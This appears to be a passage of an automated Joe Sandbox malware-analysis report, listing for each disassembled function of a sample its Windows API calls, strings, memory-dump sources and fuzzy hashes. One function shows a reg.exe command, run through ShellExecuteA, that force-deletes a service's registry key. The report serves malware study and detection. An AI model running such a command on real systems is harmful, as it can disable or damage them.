                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E1975
                                                                                  • _sprintf.LIBCMT ref: 6A6E199A
                                                                                  • ShellExecuteA.SHELL32(00000000,open,reg.exe,00000000,00000000,00000000), ref: 6A6E19B7
                                                                                  Strings
                                                                                  • reg.exe, xrefs: 6A6E19AB
                                                                                  • delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f, xrefs: 6A6E1994
                                                                                  • open, xrefs: 6A6E19B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell_memset_sprintf
                                                                                  • String ID: delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f$open$reg.exe
                                                                                  • API String ID: 4205763113-3721450906
                                                                                  • Opcode ID: 3dd8d9d376c3801852fe61c935c3da8da9d8311debf6a72d2353e115c4dbaffc
                                                                                  • Instruction ID: 157b2cf3b9dcab0b7c65fe0ebc2a6bfae032df9cb621b7f836956f77ca8ff24e
                                                                                  • Opcode Fuzzy Hash: 3dd8d9d376c3801852fe61c935c3da8da9d8311debf6a72d2353e115c4dbaffc
                                                                                  • Instruction Fuzzy Hash: F9F0E9B0549300BBE210D720DD4AFDA77F49BA5708F414828F6CC991C5EEB45708C793
                                                                                  Function 6A6FAAF9 Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(0000000F), ref: 6A6FAB07
                                                                                  • GetSysColor.USER32(00000010), ref: 6A6FAB0E
                                                                                  • GetSysColor.USER32(00000014), ref: 6A6FAB15
                                                                                  • GetSysColor.USER32(00000012), ref: 6A6FAB1C
                                                                                  • GetSysColor.USER32(00000006), ref: 6A6FAB23
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 6A6FAB30
                                                                                  • GetSysColorBrush.USER32(00000006), ref: 6A6FAB37
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Brush
                                                                                  • String ID:
                                                                                  • API String ID: 2798902688-0
                                                                                  • Opcode ID: c8c483714c4d11538339f82caf6cb9532513dae66ef37a70a36ad3bc0d7d6a44
                                                                                  • Instruction ID: 5137b3cb75ef9bb02181b2d8134a18fb405c7372dab9976abc4bed27684ab229
                                                                                  • Opcode Fuzzy Hash: c8c483714c4d11538339f82caf6cb9532513dae66ef37a70a36ad3bc0d7d6a44
                                                                                  • Instruction Fuzzy Hash: 77F0FE719407445BD730BB738909B47BED1FFC4710F06092ED2458B990E6B5E441DF40
                                                                                  Function 0BE98C68 Relevance: 9.2, APIs: 6, Instructions: 208sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,?), ref: 0BE98CF3
                                                                                  • Sleep.KERNEL32(00000001,00000000,?), ref: 0BE98D0D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: a2a44e0ef9dddf4becd3ae251ac7c4600880d803a8f241843f4e161edc84fcb0
                                                                                  • Instruction ID: 316e18333c204c8f7df6bc6f20c22e043ecab35b3181c461dcd90b117e4ff835
                                                                                  • Opcode Fuzzy Hash: a2a44e0ef9dddf4becd3ae251ac7c4600880d803a8f241843f4e161edc84fcb0
                                                                                  • Instruction Fuzzy Hash: 1271D0716053008FDB14CF29E984B56BBE4AF86794F18D26ED898CB3E1C770D848CB62
                                                                                  Function 6A6F1B43 Relevance: 9.1, APIs: 6, Instructions: 147networkstringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetCanonicalizeUrlA.WININET(00000825,?,00000824,?), ref: 6A6F1BF3
                                                                                  • GetLastError.KERNEL32(?,00000825,?), ref: 6A6F1BF9
                                                                                  • InternetCanonicalizeUrlA.WININET(?,00000000,00000824,?), ref: 6A6F1C33
                                                                                  • InternetCrackUrlA.WININET(?,00000000,?,02000000), ref: 6A6F1C71
                                                                                  • UrlUnescapeA.SHLWAPI(?,00000000,00000000,02100000,?,00000825,?), ref: 6A6F1C8F
                                                                                  • lstrlenA.KERNEL32(?,?,00000825,?), ref: 6A6F1CA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Canonicalize$CrackErrorLastUnescapelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2961774178-0
                                                                                  • Opcode ID: 6fc2786b3eafa9d1b6986a1380708ba9aa1fe0cbe9d481a9f6c30e015d8b115a
                                                                                  • Instruction ID: 031bf40caf0c40a78d63dfb703176a36f075adb3e7708af3c983c83251d0cd7a
                                                                                  • Opcode Fuzzy Hash: 6fc2786b3eafa9d1b6986a1380708ba9aa1fe0cbe9d481a9f6c30e015d8b115a
                                                                                  • Instruction Fuzzy Hash: A051C2B0805219DBDB258F65CC80BDA77F6FF4A784F104995EA48A6244DF359AC2CFA0
                                                                                  Function 6A6E02D0 Relevance: 9.1, APIs: 6, Instructions: 130processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0354
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
                                                                                  • Module32First.KERNEL32 ref: 6A6E0380
                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000008,?), ref: 6A6E0437
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleModule32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2655431330-0
                                                                                  • Opcode ID: 495ceb12351b6600130a9a1c45fba861be42a329d57de4e55228dd2ebd556b84
                                                                                  • Instruction ID: 2fe43eb7aeef642920d8280e5bf4447a968fba46cf508aa9187cdb00623f71f3
                                                                                  • Opcode Fuzzy Hash: 495ceb12351b6600130a9a1c45fba861be42a329d57de4e55228dd2ebd556b84
                                                                                  • Instruction Fuzzy Hash: F941C3712093419FD714CB64CC88A6BB3E9FFC9328F168A2DE45987291EF34990ACB51
                                                                                  Function 0BEB08DE Relevance: 9.1, APIs: 6, Instructions: 110threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0BEB08EB
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0BEB08FA
                                                                                    • Part of subcall function 0BEB08B8: ResetEvent.KERNEL32(00000764), ref: 0BEB08BE
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFDA98), ref: 0BEB093F
                                                                                  • InterlockedExchange.KERNEL32(0BEF8BC4,?), ref: 0BEB095B
                                                                                  • RtlLeaveCriticalSection.NTDLL(0BEFDA98), ref: 0BEB09B4
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFDA98), ref: 0BEB0A13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                  • String ID:
                                                                                  • API String ID: 2189153385-0
                                                                                  • Opcode ID: 00052d9043e68cd2cd9f6fc0caf48d63279a19a3e02dc3466980e7b81b27d095
                                                                                  • Instruction ID: 7e5cc903e8af60b03ca9a4c03101f9c82bfc568b2741bf0f110d8c8fb93d3fd3
                                                                                  • Opcode Fuzzy Hash: 00052d9043e68cd2cd9f6fc0caf48d63279a19a3e02dc3466980e7b81b27d095
                                                                                  • Instruction Fuzzy Hash: 6531A034A14704AFE711DFA8D852EAFBBF8EB89700F51E8B0E80596652D735BD04CB61
                                                                                  Function 0BEB6398 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0BEB63E6
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0BEB63F2
                                                                                  • GetDC.USER32(00000000), ref: 0BEB640E
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0BEB6435
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0BEB6442
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB647B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceMetricsSystem$Release
                                                                                  • String ID:
                                                                                  • API String ID: 447804332-0
                                                                                  • Opcode ID: 83c7a973e3e59821309b0b83c781bbbdce372722e46b2744b36cb784a2810597
                                                                                  • Instruction ID: 302234881dc817be06d5e4ce07319b806fccdfac884697d073731d071f6f5fa0
                                                                                  • Opcode Fuzzy Hash: 83c7a973e3e59821309b0b83c781bbbdce372722e46b2744b36cb784a2810597
                                                                                  • Instruction Fuzzy Hash: 90312B74E10604AFEB04DFA8C881EEEFBB5FB89710F109565E918AB390D7709D45CBA1
                                                                                  Function 6A6F0FA0 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 6A6F0FD3
                                                                                  • GetParent.USER32(?), ref: 6A6F0FE1
                                                                                  • GetParent.USER32(?), ref: 6A6F0FF4
                                                                                  • GetLastActivePopup.USER32(?), ref: 6A6F1005
                                                                                  • IsWindowEnabled.USER32(?), ref: 6A6F1019
                                                                                  • EnableWindow.USER32(?,00000000), ref: 6A6F102C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                  • String ID:
                                                                                  • API String ID: 670545878-0
                                                                                  • Opcode ID: 7b86e14402810d64c4d6d7494b4eac28673867d14e24c0dbcff3baf157cc92a8
                                                                                  • Instruction ID: 27e91e45949ef3b0491ee75a40d2c5b8a3a413e687cba1091ce2363369ef75be
                                                                                  • Opcode Fuzzy Hash: 7b86e14402810d64c4d6d7494b4eac28673867d14e24c0dbcff3baf157cc92a8
                                                                                  • Instruction Fuzzy Hash: A81191726476719BDB618AAA8845B5A66EE6F56FE5F030520ED24E7200EF20CC0386F1
                                                                                  Function 0BEB67FC Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB66AC: GetObjectA.GDI32(?,00000054), ref: 0BEB66C0
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB681E
                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 0BEB683F
                                                                                  • RealizePalette.GDI32(?), ref: 0BEB684B
                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0BEB6862
                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB688A
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB6893
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                  • String ID:
                                                                                  • API String ID: 1221726059-0
                                                                                  • Opcode ID: 4d29f39dc704d84efa799bf8cfbf3d5deb41557a64e767a8e2acd81f583653a1
                                                                                  • Instruction ID: 3e19a73ed117b4eeb86e7ff5b94d4804a3c7bd12ba113c52de3a4f9c0f0a9f4f
                                                                                  • Opcode Fuzzy Hash: 4d29f39dc704d84efa799bf8cfbf3d5deb41557a64e767a8e2acd81f583653a1
                                                                                  • Instruction Fuzzy Hash: B9115E75A10208BFDF10DBA8DC81F9FB7FCEF49610F5090A4B918E7280D674AD0487A4
